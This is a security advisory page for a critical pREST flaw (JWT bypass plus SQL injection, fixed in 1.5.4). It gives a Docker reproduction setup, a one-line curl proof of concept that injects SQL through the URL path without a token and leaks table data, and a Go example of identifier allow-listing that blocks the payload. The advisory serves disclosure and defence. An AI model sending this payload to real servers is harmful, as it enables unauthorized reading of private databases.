GHSA-wm25-j4gw-6vr3

Source
https://github.com/advisories/GHSA-wm25-j4gw-6vr3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm25-j4gw-6vr3/GHSA-wm25-j4gw-6vr3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-wm25-j4gw-6vr3
Aliases
Published
2024-07-30T15:04:26Z
Modified
2024-08-07T14:16:28Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 9.3 (Critical) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
pREST vulnerable to JWT bypass + SQL injection
Details

Summary

Probably a JWT bypass + SQL injection, or am I doing something wrong?

PoC (how to reproduce)

  1. Create the following files:

docker-compose.yml:

services:
  postgres:
    image: postgres
    container_name: postgres_container_mre
    environment:
      POSTGRES_USER: test_user_pg
      POSTGRES_PASSWORD: test_pass_pg
      POSTGRES_DB: test_db
  prest:
    image: prest/prest
    build: .
    volumes:
      - ./queries:/queries
      - ./migrations:/migrations
    ports:
      - "3000:3000"

Dockerfile:

FROM prest/prest:latest

COPY ./prest.toml prest.toml

prest.toml:

debug=false
migrations = "./migrations"

[http]
port = 3000

[jwt]
default = true
key = "secret"
algo = "HS256"

[auth]
enabled = true
type = "body"
encrypt = "MD5"
table = "prest_users"
username = "username"
password = "password"

[pg]
URL = "postgresql://test_user_pg:test_pass_pg@postgres:5432/test_db/?sslmode=disable"

[ssl]
mode = "disable"
sslcert = "./PATH"
sslkey = "./PATH"
sslrootcert = "./PATH"

[expose]
enabled = true
databases = true
schemas = true
tables = true

[queries]
location = "/queries"
  2. Run the commands:

    mkdir -p migrations queries
    docker compose up --build -d
    

    Wait for Postgres and pREST to come up, then run the following to add test data to Postgres:

    export PGPASSWORD=test_pass_pg
    docker exec -it postgres_container_mre psql -U test_user_pg -d test_db -c "CREATE TABLE IF NOT EXISTS public.some_table (id int primary key, secret_data text);\
    INSERT INTO public.some_table (id, secret_data) VALUES (1, 'some secret text') ON CONFLICT DO NOTHING;"
    
  3. SQL injection, even without a JWT token:

    curl --location '127.0.0.1:3000/test_db/public".some_table)%20s;--/auth'
    

    Output:

    [{"id": 1, "secret_data": "some secret text"}]
    
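The injection in step 3 lands in the schema/table segments of the request path, which end up inside a SQL FROM clause (CWE-89 on this page). The following Go program is an added example, not pREST's own code, showing the check a defender would want in front of that interpolation: each path segment of an assumed /{database}/{schema}/{table} route must match a conservative identifier allow-list before it is double-quoted and joined into a table reference, and anything else is rejected outright rather than escaped. The route shape, the regex, and the function names are assumptions for the example; pREST's JWT middleware is not modelled here, so the auth-bypass half of the advisory is out of scope.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// identRe is a deliberately strict allow-list for unquoted PostgreSQL-style
// identifiers (letters, digits, underscore; max 63 bytes). Quotes, spaces,
// parentheses and comment markers never match, so the PoC payload is refused.
var identRe = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]{0,62}$`)

// ErrBadIdentifier is returned (wrapped) for any segment that fails the allow-list.
var ErrBadIdentifier = errors.New("rejected SQL identifier")

// QuoteIdentifier validates name against the allow-list and returns it wrapped
// in double quotes so it cannot change the structure of the statement it is
// placed in.
func QuoteIdentifier(name string) (string, error) {
	if !identRe.MatchString(name) {
		return "", fmt.Errorf("%w: %q", ErrBadIdentifier, name)
	}
	return `"` + name + `"`, nil
}

// TableRef parses a request path of the assumed form /{database}/{schema}/{table}
// (percent-decoding it the way a server would), validates all three segments
// and returns the quoted three-part reference, e.g. "test_db"."public"."some_table".
func TableRef(rawPath string) (string, error) {
	u, err := url.Parse(rawPath)
	if err != nil {
		return "", err
	}
	parts := strings.Split(strings.Trim(u.Path, "/"), "/")
	if len(parts) != 3 {
		return "", fmt.Errorf("expected /database/schema/table, got %q", u.Path)
	}
	quoted := make([]string, 0, len(parts))
	for _, p := range parts {
		q, err := QuoteIdentifier(p)
		if err != nil {
			return "", err
		}
		quoted = append(quoted, q)
	}
	return strings.Join(quoted, "."), nil
}

func main() {
	// Constructed inputs: a benign path and the advisory's PoC path.
	for _, p := range []string{
		"/test_db/public/some_table",
		`/test_db/public".some_table)%20s;--/auth`,
	} {
		ref, err := TableRef(p)
		if err != nil {
			fmt.Printf("reject %q: %v\n", p, err)
			continue
		}
		fmt.Printf("accept %q -> SELECT * FROM %s\n", p, ref)
	}
}
```

Note that the PoC path decodes to three segments (test_db, the payload, auth), so a length check alone would not catch it; it is the per-segment allow-list that rejects the `"`, space and `;--` characters. Using a positional parameter is not an option for an identifier, which is why an allow-list plus quoting is the usual defence for table and schema names taken from a URL.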
Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-287",
        "CWE-89"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-30T15:04:26Z"
}
References

Affected packages

Go / github.com/prest/prest

Package

Name
github.com/prest/prest
Purl
pkg:golang/github.com/prest/prest

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.5.4